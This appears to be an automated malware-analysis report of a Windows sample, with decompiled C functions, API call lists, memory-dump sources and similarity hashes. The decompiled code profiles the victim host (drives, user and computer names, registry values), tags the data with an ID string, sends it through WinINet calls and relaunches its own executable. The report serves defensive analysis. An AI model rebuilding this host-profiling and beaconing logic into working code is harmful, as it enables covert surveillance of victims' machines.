                                                                                        				void* _t92;
                                                                                        
                                                                                        				_v44 = 0;
                                                                                        				_v40 = E00401D08(0x40edce);	// format string, copied to a heap buffer by E00401D08 (RtlAllocateHeap)
                                                                                        				_v8 = E00407D8B();		// logical drive strings (GetLogicalDriveStringsW)
                                                                                        				_v12 = E00407EFB();		// user name (GetUserNameW)
                                                                                        				_v16 = E00407F99();		// computer name (GetComputerNameW)
                                                                                        				_v20 = E00408016();		// registry value read under HKEY_CURRENT_USER (RegQueryValueExW)
                                                                                        				_v24 = E00408132();		// no API references recorded for this subcall
                                                                                        				_v28 = E00408160();		// registry value read under HKEY_LOCAL_MACHINE (RegQueryValueExW)
                                                                                        				_v32 = E00408249();		// registry value read under HKEY_LOCAL_MACHINE (RegQueryValueExW)
                                                                                        				_v36 = E00408371();		// heap-allocated string (RtlAllocateHeap)
                                                                                        				_t58 = wcslen(_v8);
                                                                                        				_t59 = wcslen(_v12);
                                                                                        				_t60 = wcslen(_v16);
                                                                                        				_t61 = wcslen(_v20);
                                                                                        				_t62 = wcslen(_v24);
                                                                                        				_t63 = wcslen(_v28);
                                                                                        				_t64 = wcslen(_v32);
                                                                                        				_t65 = wcslen(_v36);
                                                                                        				// Output buffer sized for all nine strings as UTF-16 plus a terminator; *0x40f5d6 holds the
                                                                                        				// heap handle and flag 8 is HEAP_ZERO_MEMORY.
                                                                                        				_v44 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t58 + _t59 + _t60 + _t61 + _t62 + _t63 + _t64 + _t65 + wcslen(_v40)) * 2);
                                                                                        				if(_v44 != 0) {
                                                                                        					// Indirect call through 0x40f69c; the API list resolves it to _swprintf (ref 004084E4),
                                                                                        					// so _v40 is the format string and _t92 the number of characters written.
                                                                                        					_t92 =  *0x40f69c(_v44, _v40, _v20, _v12, _v16, _v24, _v28, _v36, _v8, _v32);
                                                                                        					E00401147(_t79, _v44, _v44);	// _t79 was not recovered by the decompiler
                                                                                        					_t36 = _t92 + 1; // 0x1
                                                                                        					// Shrink the buffer to the length returned by _swprintf plus one
                                                                                        					_v44 = RtlReAllocateHeap( *0x40f5d6, 0, _v44, _t36);
                                                                                        				}
                                                                                        				// Release the intermediate strings; the caller owns the returned buffer
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v40);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v20);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v24);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v28);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v36);
                                                                                        				return _v44;
                                                                                        			}

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                          • Part of subcall function 00407D8B: GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00407DA1
                                                                                          • Part of subcall function 00407EFB: GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F2E
                                                                                          • Part of subcall function 00407EFB: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407F47
                                                                                          • Part of subcall function 00407EFB: GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F5D
                                                                                          • Part of subcall function 00407EFB: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407F72
                                                                                          • Part of subcall function 00407F99: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FB9
                                                                                          • Part of subcall function 00407F99: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407FD2
                                                                                          • Part of subcall function 00407F99: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FE8
                                                                                          • Part of subcall function 00407F99: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407FFD
                                                                                          • Part of subcall function 00408016: RegCreateKeyExW.ADVAPI32(80000001,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EF6A,0040EF50,0040EF14,?,00000000), ref: 0040806C
                                                                                          • Part of subcall function 00408016: RegQueryValueExW.ADVAPI32(?,00408406,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 00408098
                                                                                          • Part of subcall function 00408016: RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,?,00000010,?,00000000,?,?,00000000), ref: 004080B6
                                                                                          • Part of subcall function 00408016: RtlAllocateHeap.NTDLL(00000008,00000010), ref: 004080CB
                                                                                          • Part of subcall function 00408016: wcscpy.NTDLL ref: 004080E1
                                                                                          • Part of subcall function 00408016: NtClose.NTDLL(?), ref: 004080ED
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 004080FE
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,00408406), ref: 0040810F
                                                                                          • Part of subcall function 00408016: RtlFreeHeap.NTDLL(00000000,?), ref: 00408120
                                                                                          • Part of subcall function 00408160: RegCreateKeyExW.ADVAPI32(80000002,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EFE0,0040EF82,?,00000000,?,?,00000000), ref: 004081AC
                                                                                          • Part of subcall function 00408160: RegQueryValueExW.ADVAPI32(?,00408416,00000000,00000001,?,00000080,?,00000000,?,?,00000000), ref: 004081DB
                                                                                          • Part of subcall function 00408160: RtlAllocateHeap.NTDLL(00000008,00000080), ref: 004081F0
                                                                                          • Part of subcall function 00408160: wcscpy.NTDLL ref: 00408209
                                                                                          • Part of subcall function 00408160: NtClose.NTDLL(?), ref: 00408215
                                                                                          • Part of subcall function 00408160: RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 00408226
                                                                                          • Part of subcall function 00408160: RtlFreeHeap.NTDLL(00000000,00408416), ref: 00408237
                                                                                          • Part of subcall function 00408249: memset.NTDLL ref: 0040827F
                                                                                          • Part of subcall function 00408249: RegCreateKeyExW.ADVAPI32(80000002,0040F1F6,00000000,00000000,00000000,00020119,00000000,?,?,?,?,00000000), ref: 004082A5
                                                                                          • Part of subcall function 00408249: RegQueryValueExW.ADVAPI32(?,00408ACB,00000000,00000001,?,00000080,?,?,00000000), ref: 004082D8
                                                                                          • Part of subcall function 00408249: RtlAllocateHeap.NTDLL(00000008,0000002A,?), ref: 00408320
                                                                                          • Part of subcall function 00408249: NtClose.NTDLL(?), ref: 0040833D
                                                                                          • Part of subcall function 00408249: RtlFreeHeap.NTDLL(00000000,0040F1F6), ref: 0040834E
                                                                                          • Part of subcall function 00408249: RtlFreeHeap.NTDLL(00000000,00408ACB), ref: 0040835F
                                                                                          • Part of subcall function 00408371: RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00408386
                                                                                        • wcslen.NTDLL ref: 0040842C
                                                                                        • wcslen.NTDLL ref: 0040843A
                                                                                        • wcslen.NTDLL ref: 00408448
                                                                                        • wcslen.NTDLL ref: 00408456
                                                                                        • wcslen.NTDLL ref: 00408464
                                                                                        • wcslen.NTDLL ref: 00408472
                                                                                        • wcslen.NTDLL ref: 00408480
                                                                                        • wcslen.NTDLL ref: 0040848E
                                                                                        • wcslen.NTDLL ref: 0040849C
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004084B7
                                                                                        • _swprintf.NTDLL ref: 004084E4
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00000000), ref: 00408509
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040851D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040852E
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040853F
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408550
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408561
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408572
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040F1C3), ref: 00408583
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040C004), ref: 00408594
                                                                                        • RtlFreeHeap.NTDLL(00000000,004089C5), ref: 004085A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocatewcslen$NameQueryValue$CloseCreate$ComputerUserwcscpy$DriveLogicalStrings_swprintfmemset
                                                                                        • String ID:
                                                                                        • API String ID: 163038443-0
                                                                                        • Opcode ID: 4285a408cb7404e7de5b10c603a16a1f63beaed640eabec9b826ea59315b8b1a
                                                                                        • Instruction ID: e05b2a26a45fa882e0c1d663b97f739c412683bd3cabc5d42f6bf846e013e871
                                                                                        • Opcode Fuzzy Hash: 4285a408cb7404e7de5b10c603a16a1f63beaed640eabec9b826ea59315b8b1a
                                                                                        • Instruction Fuzzy Hash: EF51B3B2900208BFDF219FE0EE4ABADBB71FB08301F144435E601B5571DA765A29AB59
                                                                                        Uniqueness
                                                                                        • Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004073BA
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • VariantInit.OLEAUT32(?), ref: 00407516
                                                                                        • VariantInit.OLEAUT32(?), ref: 00407520
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$InitVariant$AllocateInitialize_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2550189856-0
                                                                                        • Opcode ID: 3f24eb82e77c7db4ac39f59d52d4b38cdfa0bdfe61f1436edeb8bebd0136be23
                                                                                        • Instruction ID: 34010a8620d9c8899b94cc26a3947e1abdf1f5591684aa8c2c83d3d23a8b7264
                                                                                        • Instruction Fuzzy Hash: 2FC15570900209EFDB10DF90DD48BAE7B75FF04309F208579E505BA1A1D77AA94ACF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004063FB(wchar_t* _a4, char _a8) {
                                                                                        				WCHAR* _v8;
                                                                                        				short _v528;
                                                                                        				signed int _t22;
                                                                                        				void* _t24;
                                                                                        				int _t29;
                                                                                        				void* _t34;
                                                                                        				void* _t35;
                                                                                        
                                                                                        				GetCurrentDirectoryW(0x104,  &_v528);
                                                                                        				if((GetFileAttributesW(_a4) & 0x00000010) == 0) {
                                                                                        					_t22 = wcslen(_a4);
                                                                                        					_t35 = _t34 + 4;
                                                                                        					_t24 = RtlAllocateHeap( *0x40f5d6, 8, 2 + _t22 * 2);
                                                                                        					_v8 = _t24;
                                                                                        					if(_v8 != 0) {
                                                                                        						wcscpy(_v8, _a4);
                                                                                        						_t34 = _t35 + 8;
                                                                                        						 *(PathFindFileNameW(_v8)) = 0;
                                                                                        						SetCurrentDirectoryW(_v8);
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        						L5:
                                                                                        						_t16 =  &_a8; // 0x40672d
                                                                                        						_t29 = strlen( *_t16);
                                                                                        						_t17 =  &_a8; // 0x40672d
                                                                                        						E00401C9B(0x40f610,  *_t17, _t29);
                                                                                        						return SetCurrentDirectoryW( &_v528);
                                                                                        					}
                                                                                        					return _t24;
                                                                                        				}
                                                                                        				SetCurrentDirectoryW(_a4);
                                                                                        				goto L5;
                                                                                        			}

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,00000003), ref: 00406415
                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,00000003), ref: 0040641E
                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000003), ref: 0040642E
                                                                                        • wcslen.NTDLL ref: 00406439
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000003), ref: 00406452
                                                                                        • strlen.NTDLL ref: 0040649D
                                                                                          • Part of subcall function 00401C9B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
                                                                                          • Part of subcall function 00401C9B: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
                                                                                          • Part of subcall function 00401C9B: NtClose.NTDLL(000000FF), ref: 00401CF4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,0040F610,?,00000000), ref: 004064BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryFile$AllocateAttributesCloseCreateHeapWritestrlenwcslen
                                                                                        • String ID: -g@
                                                                                        • API String ID: 2483183635-2478092369
                                                                                        • Opcode ID: 86613c93632f326b70cbcd28f7034b2996bff5ff15503ac7b63aebd1d98503b6
                                                                                        • Instruction ID: e5a510f47fc1cffbdd5bc3104043d0cbda6536fb01490dcca553208fb85b6640
                                                                                        • Instruction Fuzzy Hash: 93212C76400208FFEB21AFA4EE09B9D7B38FB44311F108071F906B15B1D7365A69EB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00408995() {
                                                                                        				void* _v8;
                                                                                        				char* _v12;
                                                                                        				char* _v16;
                                                                                        				int _t22;
                                                                                        				int _t23;
                                                                                        				int _t24;
                                                                                        				void* _t34;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_v16 = E00401D08(0x40f1c3);
                                                                                        				_t34 = E00401D08(0x40c004);
                                                                                        				_v12 = E004083CA();
                                                                                        				if(_v12 != 0) {
                                                                                        					_t22 = strlen(_v16);
                                                                                        					_t23 = strlen(_t34);
                                                                                        					_t24 = strlen(_v12);
                                                                                        					_v8 = RtlAllocateHeap( *0x40f5d6, 8, _t22 + _t23 + _t24 + strlen("0601ac206b9e361"));
                                                                                        					if(_v8 != 0) {
                                                                                        						E004085B7(_v8, sprintf(_v8, _v16, _t34, "0601ac206b9e361", _v12));
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v8);
                                                                                        					}
                                                                                        				}
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t34);
                                                                                        				return RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        			}

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040842C
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040843A
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408448
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408456
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408464
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408472
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 00408480
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040848E
                                                                                          • Part of subcall function 004083CA: wcslen.NTDLL ref: 0040849C
                                                                                          • Part of subcall function 004083CA: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004084B7
                                                                                          • Part of subcall function 004083CA: _swprintf.NTDLL ref: 004084E4
                                                                                          • Part of subcall function 004083CA: RtlReAllocateHeap.NTDLL(00000000,00000000,00000001,00000000), ref: 00408509
                                                                                          • Part of subcall function 004083CA: RtlFreeHeap.NTDLL(00000000,?), ref: 0040851D
                                                                                        • strlen.NTDLL ref: 004089D5
                                                                                        • strlen.NTDLL ref: 004089E1
                                                                                        • strlen.NTDLL ref: 004089EF
                                                                                        • strlen.NTDLL ref: 004089FF
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408A13
                                                                                        • sprintf.NTDLL ref: 00408A31
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088A8
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088B7
                                                                                          • Part of subcall function 004085B7: InternetCloseHandle.WININET(00000000), ref: 004088C6
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088DD
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088F4
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040890B
                                                                                          • Part of subcall function 004085B7: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408922
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408A4E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,0040C004), ref: 00408A5F
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408A6E
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00408A7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Freewcslen$Allocatestrlen$CloseHandleInternet$_swprintfsprintf
                                                                                        • String ID: 0601ac206b9e361
                                                                                        • API String ID: 3103718647-1052532395
                                                                                        • Opcode ID: 3d3457962de922cdfbf91ef8efe8748602cbc80aa8267ec0ebd1debec19913b1
                                                                                        • Instruction ID: b943f6e790cac8dbb39e703a917fdd03bf21e5a8bfba539a12e109ef2e2e7866
                                                                                        • Instruction Fuzzy Hash: 382127B1901208BFEB216FA0EE0AFAD7B74FB04309F240475F601715B1EB761A699B5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004042DE
                                                                                        • VariantInit.OLEAUT32(?), ref: 00404422
                                                                                        • _swprintf.NTDLL ref: 00404451
                                                                                        • VariantClear.OLEAUT32(?), ref: 00404476
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044D0
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044E7
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004044FE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404515
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040452C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404543
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040455A
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Variant$AllocateClearInitInitialize_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 943987305-0
                                                                                        • Opcode ID: 9ac38d6b186c4428392428dd786d34e63089a0cd43ff480591ad364da24d959b
                                                                                        • Instruction ID: d5d5127211e33d520d232e1592a3508245044a1f8bf9fbf2929d31acc83c229f
                                                                                        • Instruction Fuzzy Hash: 00913671A00209EBEB219F90DC49BEEBBB5FF44704F208175E600BA2E0D3795955DFA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00403D8F() {
                                                                                        				short _v524;
                                                                                        				short _v1044;
                                                                                        				short _v1564;
                                                                                        				long _v2084;
                                                                                        				void* _t34;
                                                                                        				void* _t35;
                                                                                        				void* _t36;
                                                                                        
                                                                                        				GetModuleFileNameW( *0x40f5da,  &_v524, 0x104);
                                                                                        				GetShortPathNameW( &_v524,  &_v2084, 0x104);
                                                                                        				_t34 = E00401D08(0x40e7be);
                                                                                        				wcscpy( &_v1044, _t34);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t34);
                                                                                        				wcscat( &_v1044,  &_v2084);
                                                                                        				_t35 = E00401D08(0x40e7f2);
                                                                                        				wcscat( &_v1044, _t35);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t35);
                                                                                        				_t36 = E00401D08(0x40e7de);
                                                                                        				GetEnvironmentVariableW(_t36,  &_v1564, 0x104);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _t36);
                                                                                        				return ShellExecuteW(0, 0,  &_v1564,  &_v1044, 0, 0);
                                                                                        			}

                                                                                        Instruction addresses of the decompiled statements above, in order: 0x00403daa, 0x00403dc3, 0x00403dd3, 0x00403ddd, 0x00403def, 0x00403e03, 0x00403e16, 0x00403e20, 0x00403e32, 0x00403e42, 0x00403e51, 0x00403e60, 0x00403e85

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,00000104), ref: 00403DAA
                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00403DC3
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • wcscpy.NTDLL ref: 00403DDD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403DEF
                                                                                        • wcscat.NTDLL ref: 00403E03
                                                                                        • wcscat.NTDLL ref: 00403E20
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403E32
                                                                                        • GetEnvironmentVariableW.KERNEL32(00000000,?,00000104,0040E7DE), ref: 00403E51
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403E60
                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00403E7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Namewcscat$AllocateEnvironmentExecuteFileModulePathShellShortVariablewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2400797703-0
                                                                                        • Opcode ID: a4e0b2ea962a39828c207258dcd41693dd5c123b769e641acf5216dca4a88896
                                                                                        • Instruction ID: 750baac0f5715775a624c6a095a865806a038d97b203efbd5f9f55d6af3a4420
                                                                                        • Opcode Fuzzy Hash: a4e0b2ea962a39828c207258dcd41693dd5c123b769e641acf5216dca4a88896
                                                                                        • Instruction Fuzzy Hash: C12150B254020CBBD720ABA0ED4AFE9376CFB08305F000476F605F24A1DA7169998BA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 78%
                                                                                        			E00408A8E(void* __fp0, signed int _a4) {
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				void* _v24;
                                                                                        				char* _v28;
                                                                                        				char* _v32;
                                                                                        				char _v48;
                                                                                        				void* _t34;
                                                                                        				int _t35;
                                                                                        				char _t38;
                                                                                        
                                                                                        				_v24 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v32 = E00401D08(0x40f1f6);
                                                                                        				if(_v32 != 0) {
                                                                                        					_v24 = E00408249();
                                                                                        					if(_v24 != 0) {
                                                                                        						_t34 = E00401147(_t33, _v24, _v24);
                                                                                        						_t35 = strlen(_v32);
                                                                                        						_t11 = _t34 + _t35 + strlen("0601ac206b9e361") + 0x40; // 0x40
                                                                                        						_t38 = RtlAllocateHeap( *0x40f5d6, 8, _t11);
                                                                                        						_v28 = _t38;
                                                                                        						if(_v28 != 0) {
                                                                                        							_t39 = _a4;
                                                                                        							asm("wait");
                                                                                        							asm("fninit");
                                                                                        							asm("fild qword [0x40f63c]");
                                                                                        							_v20 = 0x40000000;
                                                                                        							asm("fild dword [ebp-0x10]");
                                                                                        							asm("fdivp st1, st0");
                                                                                        							[tword [ebp-0xc] = __fp0;
                                                                                        							E00401430( &_v16, 2,  &_v48, 2);
                                                                                        							E004085B7(_v28, sprintf(_v28, _v32, _v24, "0601ac206b9e361",  *0x40f638,  &_v48,  *0x40f644, _a4 / 0x3e8, _t39 % 0x3e8));
                                                                                        							_t38 = RtlFreeHeap( *0x40f5d6, 0, _v28);
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v24 != 0) {
                                                                                        					_t38 = RtlFreeHeap( *0x40f5d6, 0, _v24);
                                                                                        				}
                                                                                        				if(_v32 == 0) {
                                                                                        					return _t38;
                                                                                        				} else {
                                                                                        					return RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        				}
                                                                                        			}

                                                                                        Instruction addresses of the decompiled statements above, in order: 0x00408a99, 0x00408aa0, 0x00408aa7, 0x00408ab8, 0x00408abf, 0x00408acb, 0x00408ad2, 0x00408adf, 0x00408ae9, 0x00408b04, 0x00408b10, 0x00408b16, 0x00408b1d, 0x00408b21, 0x00408b31, 0x00408b32, 0x00408b34, 0x00408b3a, 0x00408b41, 0x00408b44, 0x00408b46, 0x00408b55, 0x00408b87, 0x00408b97, 0x00408b97, 0x00408b1d, 0x00408ad2, 0x00408ba1, 0x00408bae, 0x00408bae, 0x00408bb8, 0x00408bd3, 0x00408bba, 0x00000000, 0x00408bc5

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408BAE
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate
                                                                                        • String ID: 0601ac206b9e361
                                                                                        • API String ID: 3472947110-1052532395
                                                                                        • Opcode ID: 282238462acdf5acc471cb7da1bb4f9528e7c10fa6baeaeda1a475af4ee8dc6a
                                                                                        • Instruction ID: 53233c6c3efd7d11c22a32d7b2ef3227990e67a63ea7894f42ffe2d7879e7d3d
